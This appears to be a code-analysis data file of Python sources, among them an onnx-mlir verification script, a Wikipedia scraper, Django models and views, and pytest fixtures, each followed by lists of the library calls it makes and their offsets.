# args.shape_info in the form of 'input_index:d1xd2, input_index:d1xd2'
input_shapes = {}
if args.shape_info:
for input_shape in args.shape_info.strip().split(","):
input_index_shape = input_shape.split(":")
input_index = input_index_shape[0]
assert not (input_index in input_shapes), "Duplicate input indices"
dims = [int(d) for d in input_index_shape[1].split("x")]
input_shapes[int(input_index)] = dims
# Load the onnx model.
model = onnx.load(args.model_path)
# Get the output names that we want to verify.
# If using onnxruntime for verification, we can verify every operation output.
output_names = [o.name for o in model.graph.output]
output_names = list(OrderedDict.fromkeys(output_names))
if (args.verify and args.verify == "onnxruntime"):
output_names = sum([[n for n in node.output if n != '']
for node in model.graph.node], [])
output_names = list(OrderedDict.fromkeys(output_names))
model = extend_model_output(model, output_names)
# Compile, run, and verify.
with tempfile.TemporaryDirectory() as temp_dir:
print("Temporary directory has been created at {}".format(temp_dir))
print("Compiling the model ...")
# Save modified model & invoke onnx-mlir to compile it.
temp_model_path = os.path.join(temp_dir, "model.onnx")
onnx.save(model, temp_model_path)
command_str = ONNX_MLIR
if args.compile_args:
command_str += " " + args.compile_args
command_str += " " + temp_model_path
start = time.perf_counter()
execute_commands(command_str)
end = time.perf_counter()
print(" took ", end - start, " seconds.\n")
# Prepare input data.
inputs = []
input_names = []
if (args.verify and args.verify.lower() == "ref"):
assert args.ref_folder, "No reference folder given"
inputs, input_names = read_input_from_refs(model, args.ref_folder)
else:
inputs, input_names = generate_random_input(model, input_shapes)
# Print the input if required.
if (args.print_input):
for i, inp in enumerate(inputs):
print("The {} input {}:{} is: \n {} \n".format(
ordinal(i + 1), input_names[i], list(inp.shape), inp))
print("Running inference ...")
temp_shared_lib_path = os.path.join(temp_dir, "model.so")
start = time.perf_counter()
# Use the generated shared library to create an execution session.
sess = ExecutionSession(temp_shared_lib_path, "run_main_graph")
outs = sess.run(inputs)
end = time.perf_counter()
print(" took ", end - start, " seconds.\n")
# Print the output if required.
if (args.print_output):
for i, out in enumerate(outs):
print("The {} output {}:{} is: \n {} \n".format(
ordinal(i + 1), output_names[i], list(out.shape), out))
# Run the model with reference backend and get results.
if (args.verify):
ref_outs = []
if (args.verify.lower() == "onnxruntime"):
# Reference backend by using onnxruntime.
import onnxruntime
output_names = list(map(lambda x: x.name, model.graph.output))
input_feed = dict(zip(input_names, inputs))
print("Running inference using onnxruntime ...")
start = time.perf_counter()
ref_session = onnxruntime.InferenceSession(temp_model_path)
ref_outs = ref_session.run(output_names, input_feed)
end = time.perf_counter()
print(" took ", end - start, " seconds.\n")
elif (args.verify.lower() == "ref"):
ref_outs = read_output_from_refs(model, args.ref_folder)
else:
print("Invalid verify option")
exit()
# For each output tensor, compare results.
for i, name in enumerate(output_names):
print("Verifying value of {}:{}".format(name, list(outs[i].shape)),
"using atol={}, rtol={} ...".format(args.atol, args.rtol))
total_elements = 0
mismatched_elements = 0
for index, actual_val in np.ndenumerate(outs[i]):
total_elements += 1
ref_val = ref_outs[i][index]
# Use equation atol + rtol * abs(desired), that is used in assert_allclose.
diff = float(args.atol) + float(args.rtol) * abs(ref_val)
if (abs(actual_val - ref_val) <= diff):
continue
mismatched_elements += 1
print(" at {}".format(index),
"mismatch {} (actual)".format(actual_val),
"vs {} (reference)".format(ref_val))
if mismatched_elements == 0:
print(" correct.\n".format(
args.atol, args.rtol))
else:
print(" mismatched elements {}/{}.\n".format(
mismatched_elements, total_elements))
if __name__ == '__main__':
main()
| [
"PyRuntime.ExecutionSession",
"tempfile.TemporaryDirectory",
"onnx.save",
"collections.OrderedDict.fromkeys",
"argparse.ArgumentParser",
"onnx.helper.make_tensor_value_info",
"os.path.join",
"os.environ.get",
"time.perf_counter",
"onnxruntime.InferenceSession",
"onnx.TensorProto",
"numpy.ndenu... | [((212, 237), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (235, 237), False, 'import argparse\n'), ((2061, 2093), 'os.environ.get', 'os.environ.get', (['"""VERBOSE"""', '(False)'], {}), "('VERBOSE', False)\n", (2075, 2093), False, 'import os\n'), ((2208, 2276), 'os.path.join', 'os.path.join', (["os.environ['ONNX_MLIR_HOME']", '"""bin"""', 'ONNX_MLIR_EXENAME'], {}), "(os.environ['ONNX_MLIR_HOME'], 'bin', ONNX_MLIR_EXENAME)\n", (2220, 2276), False, 'import os\n'), ((2392, 2441), 'os.path.join', 'os.path.join', (["os.environ['ONNX_MLIR_HOME']", '"""lib"""'], {}), "(os.environ['ONNX_MLIR_HOME'], 'lib')\n", (2404, 2441), False, 'import os\n'), ((2442, 2470), 'sys.path.append', 'sys.path.append', (['RUNTIME_DIR'], {}), '(RUNTIME_DIR)\n', (2457, 2470), False, 'import sys\n'), ((1669, 1707), 'os.environ.get', 'os.environ.get', (['"""ONNX_MLIR_HOME"""', 'None'], {}), "('ONNX_MLIR_HOME', None)\n", (1683, 1707), False, 'import os\n'), ((2897, 2930), 'subprocess.call', 'subprocess.call', (['cmds'], {'shell': '(True)'}), '(cmds, shell=True)\n', (2912, 2930), False, 'import subprocess\n'), ((4850, 4868), 'numpy.random.seed', 'np.random.seed', (['(42)'], {}), '(42)\n', (4864, 4868), True, 'import numpy as np\n'), ((6651, 6677), 'onnx.load', 'onnx.load', (['args.model_path'], {}), '(args.model_path)\n', (6660, 6677), False, 'import onnx\n'), ((3256, 3328), 'onnx.helper.make_tensor_value_info', 'onnx.helper.make_tensor_value_info', (['output_name', 'DUMMY_TENSOR_TYPE', 'None'], {}), '(output_name, DUMMY_TENSOR_TYPE, None)\n', (3290, 3328), False, 'import onnx\n'), ((4384, 4402), 'onnx.TensorProto', 'onnx.TensorProto', ([], {}), '()\n', (4400, 4402), False, 'import onnx\n'), ((6893, 6927), 'collections.OrderedDict.fromkeys', 'OrderedDict.fromkeys', (['output_names'], {}), '(output_names)\n', (6913, 6927), False, 'from collections import OrderedDict\n'), ((7274, 7303), 'tempfile.TemporaryDirectory', 'tempfile.TemporaryDirectory', ([], {}), '()\n', (7301, 7303), False, 'import tempfile\n'), ((7526, 7562), 'os.path.join', 'os.path.join', (['temp_dir', '"""model.onnx"""'], {}), "(temp_dir, 'model.onnx')\n", (7538, 7562), False, 'import os\n'), ((7571, 7604), 'onnx.save', 'onnx.save', (['model', 'temp_model_path'], {}), '(model, temp_model_path)\n', (7580, 7604), False, 'import onnx\n'), ((7779, 7798), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (7796, 7798), False, 'import time\n'), ((7851, 7870), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (7868, 7870), False, 'import time\n'), ((8618, 8652), 'os.path.join', 'os.path.join', (['temp_dir', '"""model.so"""'], {}), "(temp_dir, 'model.so')\n", (8630, 8652), False, 'import os\n'), ((8669, 8688), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (8686, 8688), False, 'import time\n'), ((8779, 8835), 'PyRuntime.ExecutionSession', 'ExecutionSession', (['temp_shared_lib_path', '"""run_main_graph"""'], {}), "(temp_shared_lib_path, 'run_main_graph')\n", (8795, 8835), False, 'from PyRuntime import ExecutionSession\n'), ((8882, 8901), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (8899, 8901), False, 'import time\n'), ((3865, 3883), 'onnx.TensorProto', 'onnx.TensorProto', ([], {}), '()\n', (3881, 3883), False, 'import onnx\n'), ((4523, 4555), 'onnx.numpy_helper.to_array', 'numpy_helper.to_array', (['output_ts'], {}), '(output_ts)\n', (4544, 4555), False, 'from onnx import numpy_helper\n'), ((7139, 7173), 'collections.OrderedDict.fromkeys', 'OrderedDict.fromkeys', (['output_names'], {}), '(output_names)\n', (7159, 7173), False, 'from collections import OrderedDict\n'), ((4004, 4035), 'onnx.numpy_helper.to_array', 'numpy_helper.to_array', (['input_ts'], {}), '(input_ts)\n', (4025, 4035), False, 'from onnx import numpy_helper\n'), ((9705, 9724), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (9722, 9724), False, 'import time\n'), ((9755, 9800), 'onnxruntime.InferenceSession', 'onnxruntime.InferenceSession', (['temp_model_path'], {}), '(temp_model_path)\n', (9783, 9800), False, 'import onnxruntime\n'), ((9892, 9911), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (9909, 9911), False, 'import time\n'), ((10572, 10595), 'numpy.ndenumerate', 'np.ndenumerate', (['outs[i]'], {}), '(outs[i])\n', (10586, 10595), True, 'import numpy as np\n'), ((5952, 5996), 'numpy.random.uniform', 'np.random.uniform', (['(-1.0)', '(1.0)', 'explicit_shape'], {}), '(-1.0, 1.0, explicit_shape)\n', (5969, 5996), True, 'import numpy as np\n')] |
import requests
from json import loads
from bs4 import BeautifulSoup
from os import environ
l = ['atom','moon','star','space','astro','cluster','galaxy','sky','planet','solar','science','physic','scientist','cosmos']
def clean(text):
while '[' in text:
text = text.replace(text[text.find('['):text.find(']',text.find('['))+1],'')
return text
def get_wiki(search_query):
if len(search_query.split()) == 1:
search_query = search_query.capitalize()
not_space = False
try:
headers = {
'Authorization': environ['api_key5'],
'User-Agent': 'Advaith'
}
page = f'https://en.wikipedia.org/w/rest.php/v1/page/{search_query}/html'
req = requests.get(page).text
soup = BeautifulSoup(req,'lxml')
d = {}
try:
if 'refer' in soup.find_all('p')[1].text:
x = d['13']
text = soup.find_all('p')[0].text
i = 1
while len(text) < 100:
text = soup.find_all('p')[i].text
i += 1
if any([z in text.lower() for z in l]):
text = clean(text)
correct = True
else:
not_space = True
correct = False
except:
for i in soup.find_all('a'):
if any([z in i.text.lower() for z in l]):
try:
search_query = i['href'][1:]
page = 'https://en.wikipedia.org/w/rest.php/v1/page' + i['href'] [1:] + '/html'
req = requests.get(page).text
soup = BeautifulSoup(req,'lxml')
i = 1
text = soup.find_all('p')[0].text
while len(text) < 100:
text = soup.find_all('p')[i].text
i += 1
text = clean(text)
correct = True
break
except:
continue
else:
correct = False
if correct:
url = 'https://api.wikimedia.org/core/v1/wikipedia/en/search/page'
parameters = {'q': search_query, 'limit': 1}
response = loads(requests.get(url, headers=headers, params=parameters).text)
image = 'https:' + response['pages'][0]['thumbnail']['url'].replace('200px','500px')
try:
desc = clean(soup.find('div', attrs = {'class':'infobox-caption'}).text)
except:
try:
desc = clean(soup.find('figcaption').text)
except:
desc = search_query
else:
image = None
except Exception as e:
print(e)
try:
return text,image,desc
except:
if not_space:
return None,None,'is not a space query'
else:
return None,None,'could not be resolved'
# return None,None,'Not found'
#return get_wiki(search_query + ' (moon)')
| [
"bs4.BeautifulSoup",
"requests.get"
] | [((775, 801), 'bs4.BeautifulSoup', 'BeautifulSoup', (['req', '"""lxml"""'], {}), "(req, 'lxml')\n", (788, 801), False, 'from bs4 import BeautifulSoup\n'), ((736, 754), 'requests.get', 'requests.get', (['page'], {}), '(page)\n', (748, 754), False, 'import requests\n'), ((2338, 2391), 'requests.get', 'requests.get', (['url'], {'headers': 'headers', 'params': 'parameters'}), '(url, headers=headers, params=parameters)\n', (2350, 2391), False, 'import requests\n'), ((1670, 1696), 'bs4.BeautifulSoup', 'BeautifulSoup', (['req', '"""lxml"""'], {}), "(req, 'lxml')\n", (1683, 1696), False, 'from bs4 import BeautifulSoup\n'), ((1615, 1633), 'requests.get', 'requests.get', (['page'], {}), '(page)\n', (1627, 1633), False, 'import requests\n')] |
from django.shortcuts import render
from django.http import JsonResponse
from django.views import View
from core.handlers.dispatcher import process_telegram_event
from app_my_places.settings import TELEGRAM_TOKEN
import json
# Create your views here.
def index(request):
return JsonResponse({"error": "forbidden"})
class TelegramBotWebhookView(View):
def post(self, request, *args, **kwargs):
process_telegram_event(json.loads(request.body))
return JsonResponse({"post": "work!"})
def get(self, request, *args, **kwargs):
return JsonResponse({"ok": "Get response work!"})
| [
"json.loads",
"django.http.JsonResponse"
] | [((284, 320), 'django.http.JsonResponse', 'JsonResponse', (["{'error': 'forbidden'}"], {}), "({'error': 'forbidden'})\n", (296, 320), False, 'from django.http import JsonResponse\n'), ((477, 508), 'django.http.JsonResponse', 'JsonResponse', (["{'post': 'work!'}"], {}), "({'post': 'work!'})\n", (489, 508), False, 'from django.http import JsonResponse\n'), ((570, 612), 'django.http.JsonResponse', 'JsonResponse', (["{'ok': 'Get response work!'}"], {}), "({'ok': 'Get response work!'})\n", (582, 612), False, 'from django.http import JsonResponse\n'), ((436, 460), 'json.loads', 'json.loads', (['request.body'], {}), '(request.body)\n', (446, 460), False, 'import json\n')] |
# Copyright (c) 2020, TU Wien, Department of Geodesy and Geoinformation
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of TU Wien, Department of Geodesy and Geoinformation
# nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL TU WIEN DEPARTMENT OF GEODESY AND
# GEOINFORMATION BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import numpy as np
def db2lin(val):
"""
Converting from linear to dB domain.
Parameters
----------
val : numpy.ndarray
Values in dB domain.
Returns
-------
val : numpy.ndarray
Values in linear domain.
"""
return 10 ** (val / 10.)
def lin2db(val):
"""
Converting from linear to dB domain.
Parameters
----------
val : numpy.ndarray
Values in linear domain.
Returns
-------
val : numpy.ndarray
Values in dB domain.
"""
return 10. * np.log10(val)
def get_window_radius(window, hp_radius):
"""
Calculates the required radius of a window function in order to achieve
the provided half power radius.
Parameters
----------
window : string
Window function name.
Current supported windows:
- Hamming
- Boxcar
hp_radius : float32
Half power radius. Radius of window function for weight
equal to 0.5 (-3 dB). In the spatial domain this corresponds to
half of the spatial resolution one would like to achieve with the
given window.
Returns
-------
r : float32
Window radius needed to achieve the given half power radius
"""
window = window.lower()
hp_weight = 0.5
if window == 'hamming':
alpha = 0.54
r = (np.pi * hp_radius) / np.arccos((hp_weight-alpha) / (1-alpha))
elif window == 'boxcar':
r = hp_radius
else:
raise ValueError('Window name not supported.')
return r
def hamming_window(radius, distances):
"""
Hamming window filter.
Parameters
----------
radius : float32
Radius of the window.
distances : numpy.ndarray
Array with distances.
Returns
-------
weights : numpy.ndarray
Distance weights.
tw : float32
Sum of weigths.
"""
alpha = 0.54
weights = alpha + (1 - alpha) * np.cos(np.pi / radius * distances)
return weights, np.sum(weights)
def boxcar(radius, distance):
"""
Boxcar filter
Parameters
----------
n : int
Length.
Returns
-------
weights : numpy.ndarray
Distance weights.
tw : float32
Sum of weigths.
"""
weights = np.zeros(distance.size)
weights[distance <= radius] = 1.
return weights, np.sum(weights)
def get_window_weights(window, radius, distance, norm=False):
"""
Function returning weights for the provided window function
Parameters
----------
window : str
Window function name
radius : float
Radius of the window.
distance : numpy.ndarray
Distance array
norm : boolean
If true, normalised weights will be returned.
Returns
-------
weights : numpy.ndarray
Weights according to distances and given window function
"""
if window == 'hamming':
weights, w_sum = hamming_window(radius, distance)
elif window == 'boxcar':
weights, w_sum = boxcar(radius, distance)
else:
raise ValueError('Window name not supported.')
if norm is True:
weights = weights / w_sum
return weights
| [
"numpy.log10",
"numpy.arccos",
"numpy.sum",
"numpy.zeros",
"numpy.cos"
] | [((3934, 3957), 'numpy.zeros', 'np.zeros', (['distance.size'], {}), '(distance.size)\n', (3942, 3957), True, 'import numpy as np\n'), ((2192, 2205), 'numpy.log10', 'np.log10', (['val'], {}), '(val)\n', (2200, 2205), True, 'import numpy as np\n'), ((3659, 3674), 'numpy.sum', 'np.sum', (['weights'], {}), '(weights)\n', (3665, 3674), True, 'import numpy as np\n'), ((4016, 4031), 'numpy.sum', 'np.sum', (['weights'], {}), '(weights)\n', (4022, 4031), True, 'import numpy as np\n'), ((3033, 3077), 'numpy.arccos', 'np.arccos', (['((hp_weight - alpha) / (1 - alpha))'], {}), '((hp_weight - alpha) / (1 - alpha))\n', (3042, 3077), True, 'import numpy as np\n'), ((3603, 3637), 'numpy.cos', 'np.cos', (['(np.pi / radius * distances)'], {}), '(np.pi / radius * distances)\n', (3609, 3637), True, 'import numpy as np\n')] |
import pytest
import tempfile
@pytest.fixture
def post(user):
from posts.models import Post
image = tempfile.NamedTemporaryFile(suffix=".jpg").name
return Post.objects.create(text='Тестовый пост 1', author=user, image=image)
@pytest.fixture
def group():
from posts.models import Group
return Group.objects.create(title='Тестовая группа 1', slug='test-link', description='Тестовое описание группы')
@pytest.fixture
def post_with_group(user, group):
from posts.models import Post
image = tempfile.NamedTemporaryFile(suffix=".jpg").name
return Post.objects.create(text='Тестовый пост 2', author=user, group=group, image=image)
@pytest.fixture
def storage_1():
from warehouse.models import Storage
return Storage.objects.create(name='storage_1')
@pytest.fixture
def storage_2():
from warehouse.models import Storage
return Storage.objects.create(name='storage_2')
@pytest.fixture
def material():
from warehouse.models import Material
return Material.objects.create(name='material')
@pytest.fixture
def instrument():
from warehouse.models import Instrument
return Instrument.objects.create(name='instrument')
@pytest.fixture
def material_in_storage_1(material, storage_1):
from warehouse.models import MaterialStorage
return MaterialStorage.objects.create(material=material, storage=storage_1, amount=2)
@pytest.fixture
def material_in_storage_2(material, storage_2):
from warehouse.models import MaterialStorage
return MaterialStorage.objects.create(material=material, storage=storage_2, amount=4)
| [
"warehouse.models.Storage.objects.create",
"posts.models.Post.objects.create",
"warehouse.models.MaterialStorage.objects.create",
"warehouse.models.Material.objects.create",
"posts.models.Group.objects.create",
"warehouse.models.Instrument.objects.create",
"tempfile.NamedTemporaryFile"
] | [((169, 238), 'posts.models.Post.objects.create', 'Post.objects.create', ([], {'text': '"""Тестовый пост 1"""', 'author': 'user', 'image': 'image'}), "(text='Тестовый пост 1', author=user, image=image)\n", (188, 238), False, 'from posts.models import Post\n'), ((316, 425), 'posts.models.Group.objects.create', 'Group.objects.create', ([], {'title': '"""Тестовая группа 1"""', 'slug': '"""test-link"""', 'description': '"""Тестовое описание группы"""'}), "(title='Тестовая группа 1', slug='test-link',\n description='Тестовое описание группы')\n", (336, 425), False, 'from posts.models import Group\n'), ((579, 666), 'posts.models.Post.objects.create', 'Post.objects.create', ([], {'text': '"""Тестовый пост 2"""', 'author': 'user', 'group': 'group', 'image': 'image'}), "(text='Тестовый пост 2', author=user, group=group, image\n =image)\n", (598, 666), False, 'from posts.models import Post\n'), ((749, 789), 'warehouse.models.Storage.objects.create', 'Storage.objects.create', ([], {'name': '"""storage_1"""'}), "(name='storage_1')\n", (771, 789), False, 'from warehouse.models import Storage\n'), ((877, 917), 'warehouse.models.Storage.objects.create', 'Storage.objects.create', ([], {'name': '"""storage_2"""'}), "(name='storage_2')\n", (899, 917), False, 'from warehouse.models import Storage\n'), ((1005, 1045), 'warehouse.models.Material.objects.create', 'Material.objects.create', ([], {'name': '"""material"""'}), "(name='material')\n", (1028, 1045), False, 'from warehouse.models import Material\n'), ((1137, 1181), 'warehouse.models.Instrument.objects.create', 'Instrument.objects.create', ([], {'name': '"""instrument"""'}), "(name='instrument')\n", (1162, 1181), False, 'from warehouse.models import Instrument\n'), ((1308, 1386), 'warehouse.models.MaterialStorage.objects.create', 'MaterialStorage.objects.create', ([], {'material': 'material', 'storage': 'storage_1', 'amount': '(2)'}), '(material=material, storage=storage_1, amount=2)\n', (1338, 1386), False, 'from warehouse.models import MaterialStorage\n'), ((1513, 1591), 'warehouse.models.MaterialStorage.objects.create', 'MaterialStorage.objects.create', ([], {'material': 'material', 'storage': 'storage_2', 'amount': '(4)'}), '(material=material, storage=storage_2, amount=4)\n', (1543, 1591), False, 'from warehouse.models import MaterialStorage\n'), ((110, 152), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', ([], {'suffix': '""".jpg"""'}), "(suffix='.jpg')\n", (137, 152), False, 'import tempfile\n'), ((520, 562), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', ([], {'suffix': '""".jpg"""'}), "(suffix='.jpg')\n", (547, 562), False, 'import tempfile\n')] |
from django.conf import settings
from django.contrib.postgres.fields import JSONField
from django.db import models
from django.db.models import Q
from django.template.loader import render_to_string
from django.utils.translation import ugettext_lazy as _
TARGET_FKEY_ATTRS = dict(
null=True,
blank=True,
on_delete=models.SET_NULL,
)
class Entry(models.Model):
created_at = models.DateTimeField(auto_now_add=True, db_index=True)
created_by = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.SET_NULL,
null=True,
blank=True,
)
entry_type = models.CharField(max_length=255)
context = models.CharField(
max_length=1024,
blank=True,
default='',
verbose_name=_('Context'),
help_text=_('The URL of the view in which the event occurred.'),
)
ip_address = models.CharField(
max_length=48,
blank=True,
default='',
verbose_name=_('IP address'),
help_text=_('The IP address this action was performed from.'),
)
# various target fkeys, sparse
event = models.ForeignKey('core.Event', **TARGET_FKEY_ATTRS)
person = models.ForeignKey('core.Person', **TARGET_FKEY_ATTRS)
organization = models.ForeignKey('core.Organization', **TARGET_FKEY_ATTRS)
feedback_message = models.ForeignKey('feedback.FeedbackMessage', **TARGET_FKEY_ATTRS)
event_survey_result = models.ForeignKey('surveys.EventSurveyResult', **TARGET_FKEY_ATTRS)
global_survey_result = models.ForeignKey('surveys.GlobalSurveyResult', **TARGET_FKEY_ATTRS)
search_term = models.CharField(max_length=255, blank=True, default='')
# we should probably have shoved them in a jsonfield in the first place
other_fields = JSONField(blank=True, default=dict)
@property
def survey_result(self):
"""
Shortcut for templates etc. that apply to both GlobalSurveyResults and EventSurveyResults.
"""
return self.event_survey_result if self.event_survey_result else self.global_survey_result
@property
def cbac_claims(self):
return ", ".join(f"{key}={value}" for (key, value) in self.other_fields.get("claims", {}).items())
@property
def signup(self):
from labour.models import Signup
if not self.event or not self.person:
return None
try:
return Signup.objects.get(event=self.event, person=self.person)
except Signup.DoesNotExist:
return None
def send_updates(self):
from .subscription import Subscription
q = Q(entry_type=self.entry_type, active=True)
# TODO need a more flexible filter solution that does not hard-code these
# One option would be to specify filter = JSONField in Subscription.
# Implementing this filter would require a client-side check or one SQL query
# per Subscription, however, as we query Subscriptions by Entry and not vice versa.
if self.event:
# Implement the event filter. Subscriptions without event_filter receive updates from
# all events. Subscriptions with event_filter receive only updates from that event.
q &= Q(event_filter=self.event) | Q(event_filter__isnull=True)
if self.event_survey_result:
# Implement event survey filter.
survey = self.event_survey_result.survey
q &= Q(event_survey_filter=survey) | Q(event_survey_filter__isnull=True)
if self.event and self.person:
# Implement job category filter
from labour.models import Signup
try:
signup = Signup.objects.get(event=self.event, person=self.person)
except Signup.DoesNotExist:
pass
else:
q &= (
Q(job_category_filter__in=signup.job_categories.all()) |
Q(job_category_filter__in=signup.job_categories_accepted.all()) |
Q(job_category_filter__isnull=True)
)
for subscription in Subscription.objects.filter(q):
subscription.send_update_for_entry(self)
@property
def entry_type_metadata(self):
if not hasattr(self, '_entry_type_metadata'):
from .. import registry
self._entry_type_metadata = registry.get(self.entry_type)
return self._entry_type_metadata
@property
def email_reply_to(self):
meta = self.entry_type_metadata
if callable(meta.email_reply_to):
return meta.email_reply_to(self)
else:
return meta.email_reply_to
@property
def message(self):
meta = self.entry_type_metadata
if callable(meta.message):
return meta.message(self)
else:
return meta.message.format(entry=self)
@property
def email_subject(self):
return '[{app_name}] {message}'.format(
app_name=settings.KOMPASSI_INSTALLATION_NAME,
message=self.message,
)
@property
def email_body(self):
meta = self.entry_type_metadata
if callable(meta.email_body_template):
return meta.email_body_template(self)
else:
return render_to_string(meta.email_body_template, dict(
entry=self,
settings=settings,
))
class Meta:
verbose_name = _('log entry')
verbose_name_plural = _('log entries')
ordering = ('-created_at',)
| [
"django.utils.translation.ugettext_lazy",
"django.contrib.postgres.fields.JSONField",
"django.db.models.ForeignKey",
"django.db.models.DateTimeField",
"django.db.models.Q",
"labour.models.Signup.objects.get",
"django.db.models.CharField"
] | [((392, 446), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)', 'db_index': '(True)'}), '(auto_now_add=True, db_index=True)\n', (412, 446), False, 'from django.db import models\n'), ((464, 562), 'django.db.models.ForeignKey', 'models.ForeignKey', (['settings.AUTH_USER_MODEL'], {'on_delete': 'models.SET_NULL', 'null': '(True)', 'blank': '(True)'}), '(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, null\n =True, blank=True)\n', (481, 562), False, 'from django.db import models\n'), ((614, 646), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)'}), '(max_length=255)\n', (630, 646), False, 'from django.db import models\n'), ((1119, 1171), 'django.db.models.ForeignKey', 'models.ForeignKey', (['"""core.Event"""'], {}), "('core.Event', **TARGET_FKEY_ATTRS)\n", (1136, 1171), False, 'from django.db import models\n'), ((1185, 1238), 'django.db.models.ForeignKey', 'models.ForeignKey', (['"""core.Person"""'], {}), "('core.Person', **TARGET_FKEY_ATTRS)\n", (1202, 1238), False, 'from django.db import models\n'), ((1258, 1317), 'django.db.models.ForeignKey', 'models.ForeignKey', (['"""core.Organization"""'], {}), "('core.Organization', **TARGET_FKEY_ATTRS)\n", (1275, 1317), False, 'from django.db import models\n'), ((1341, 1407), 'django.db.models.ForeignKey', 'models.ForeignKey', (['"""feedback.FeedbackMessage"""'], {}), "('feedback.FeedbackMessage', **TARGET_FKEY_ATTRS)\n", (1358, 1407), False, 'from django.db import models\n'), ((1434, 1501), 'django.db.models.ForeignKey', 'models.ForeignKey', (['"""surveys.EventSurveyResult"""'], {}), "('surveys.EventSurveyResult', **TARGET_FKEY_ATTRS)\n", (1451, 1501), False, 'from django.db import models\n'), ((1529, 1597), 'django.db.models.ForeignKey', 'models.ForeignKey', (['"""surveys.GlobalSurveyResult"""'], {}), "('surveys.GlobalSurveyResult', **TARGET_FKEY_ATTRS)\n", (1546, 1597), False, 'from django.db import models\n'), ((1616, 1672), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)', 'blank': '(True)', 'default': '""""""'}), "(max_length=255, blank=True, default='')\n", (1632, 1672), False, 'from django.db import models\n'), ((1769, 1804), 'django.contrib.postgres.fields.JSONField', 'JSONField', ([], {'blank': '(True)', 'default': 'dict'}), '(blank=True, default=dict)\n', (1778, 1804), False, 'from django.contrib.postgres.fields import JSONField\n'), ((2608, 2650), 'django.db.models.Q', 'Q', ([], {'entry_type': 'self.entry_type', 'active': '(True)'}), '(entry_type=self.entry_type, active=True)\n', (2609, 2650), False, 'from django.db.models import Q\n'), ((5453, 5467), 'django.utils.translation.ugettext_lazy', '_', (['"""log entry"""'], {}), "('log entry')\n", (5454, 5467), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((5498, 5514), 'django.utils.translation.ugettext_lazy', '_', (['"""log entries"""'], {}), "('log entries')\n", (5499, 5514), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((765, 777), 'django.utils.translation.ugettext_lazy', '_', (['"""Context"""'], {}), "('Context')\n", (766, 777), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((797, 850), 'django.utils.translation.ugettext_lazy', '_', (['"""The URL of the view in which the event occurred."""'], {}), "('The URL of the view in which the event occurred.')\n", (798, 850), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((977, 992), 'django.utils.translation.ugettext_lazy', '_', (['"""IP address"""'], {}), "('IP address')\n", (978, 992), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((1012, 1063), 'django.utils.translation.ugettext_lazy', '_', (['"""The IP address this action was performed from."""'], {}), "('The IP address this action was performed from.')\n", (1013, 1063), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((2402, 2458), 'labour.models.Signup.objects.get', 'Signup.objects.get', ([], {'event': 'self.event', 'person': 'self.person'}), '(event=self.event, person=self.person)\n', (2420, 2458), False, 'from labour.models import Signup\n'), ((3224, 3250), 'django.db.models.Q', 'Q', ([], {'event_filter': 'self.event'}), '(event_filter=self.event)\n', (3225, 3250), False, 'from django.db.models import Q\n'), ((3253, 3281), 'django.db.models.Q', 'Q', ([], {'event_filter__isnull': '(True)'}), '(event_filter__isnull=True)\n', (3254, 3281), False, 'from django.db.models import Q\n'), ((3435, 3464), 'django.db.models.Q', 'Q', ([], {'event_survey_filter': 'survey'}), '(event_survey_filter=survey)\n', (3436, 3464), False, 'from django.db.models import Q\n'), ((3467, 3502), 'django.db.models.Q', 'Q', ([], {'event_survey_filter__isnull': '(True)'}), '(event_survey_filter__isnull=True)\n', (3468, 3502), False, 'from django.db.models import Q\n'), ((3675, 3731), 'labour.models.Signup.objects.get', 'Signup.objects.get', ([], {'event': 'self.event', 'person': 'self.person'}), '(event=self.event, person=self.person)\n', (3693, 3731), False, 'from labour.models import Signup\n'), ((4017, 4052), 'django.db.models.Q', 'Q', ([], {'job_category_filter__isnull': '(True)'}), '(job_category_filter__isnull=True)\n', (4018, 4052), False, 'from django.db.models import Q\n')] |
import aiohttp_jinja2
import jinja2
import secrets
import random
from aiohttp import web
